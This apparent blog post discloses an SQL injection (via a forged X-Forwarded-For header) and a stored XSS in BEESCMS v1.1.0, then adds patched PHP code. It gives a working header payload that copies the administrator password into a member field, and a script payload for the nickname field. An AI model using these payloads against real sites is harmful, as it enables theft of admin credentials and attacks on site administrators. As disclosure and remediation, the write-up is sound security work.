I have been very busy with work recently, so I have rarely published articles. Recently another get_ip injection turned up in BEESCMS v1.1.0, which is a problem.
Introduction:
BEES is an enterprise website management system built on a PHP + MySQL architecture. It is developed in a modular fashion, is powerful, flexible and easy to extend, and its source code is fully open. It supports multi-language sub-sites and provides a solution for enterprise website construction and foreign-trade sites.
Vulnerability 1: SQL injection through get_ip()
fun.php

    function get_ip() {
        if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
            return $_SERVER['HTTP_CLIENT_IP'];
        } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { // this header is supplied by the client and can be forged
            return $_SERVER['HTTP_X_FORWARDED_FOR'];
        } else {
            return $_SERVER['REMOTE_ADDR'];
        }
    }
reg.php

    $ip  = get_ip();
    // the return value of get_ip() is concatenated straight into the UPDATE statement
    $sql = "update " . DB_PRE . "member set member_time = {$addtime}, member_ip = {$ip} where id = {$last_id}";
Register with the request header X-Forwarded-For set to: 127.0.0.1, member_qq = (select admin_password from bees_admin), member_phone = ziyi. The header value becomes part of the UPDATE, so the administrator password is copied into the QQ field of the newly registered member.
Vulnerability 2: XSS
Similarly, the registration page stores the nickname in the database without filtering, which allows stored XSS. Enter <script>alert('sub-meter')</script> in the nickname field. After registration succeeds, the XSS code is triggered as soon as the administrator opens member management in the back end.
First published at: Sub-meter blog
Fix:
There is not much to say about the injection vulnerability and the XSS: validate and filter the inputs identified above before they reach the SQL statement or the admin page.
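As an added example (not BEESCMS code), here is what that filtering looks like for the two spots above: a get_ip() that only returns a syntactically valid IP address, the reg.php UPDATE rewritten as a prepared statement, and output escaping for the nickname. The trusted-proxy address and the PDO connection are assumptions for this example; DB_PRE is assumed to be defined as in BEESCMS.

```php
<?php
// Added example, not the project's own code.
// Only honour proxy headers when the request really arrived through a proxy
// we operate. The address below is an assumption for this example.
const TRUSTED_PROXIES = ['10.0.0.5'];

function get_ip(): string
{
    $remote = $_SERVER['REMOTE_ADDR'] ?? '0.0.0.0';

    if (in_array($remote, TRUSTED_PROXIES, true)
        && !empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        // X-Forwarded-For is "client, proxy1, proxy2": take the first entry
        // and require that it is a valid IP literal. Anything else, such as
        // an appended SQL fragment, is discarded and REMOTE_ADDR is used.
        $first = trim(explode(',', $_SERVER['HTTP_X_FORWARDED_FOR'])[0]);
        if (filter_var($first, FILTER_VALIDATE_IP) !== false) {
            return $first;
        }
    }
    return $remote;
}

// reg.php, with the IP bound as a parameter instead of concatenated: the
// value is sent to MySQL as data and can no longer alter the statement.
function update_member_ip(PDO $db, int $last_id, int $addtime): void
{
    $stmt = $db->prepare(
        'UPDATE ' . DB_PRE . 'member SET member_time = :t, member_ip = :ip WHERE id = :id'
    );
    $stmt->execute([':t' => $addtime, ':ip' => get_ip(), ':id' => $last_id]);
}

// Nickname: escape on output so a stored "<script>" is rendered as text in
// the member-management page instead of being executed in the admin's browser.
function render_nickname(string $nick): string
{
    return htmlspecialchars($nick, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}
```

A forged header such as the one in the write-up now fails FILTER_VALIDATE_IP, so the stored member_ip is the real REMOTE_ADDR, and the nickname payload appears on the admin page as literal angle brackets.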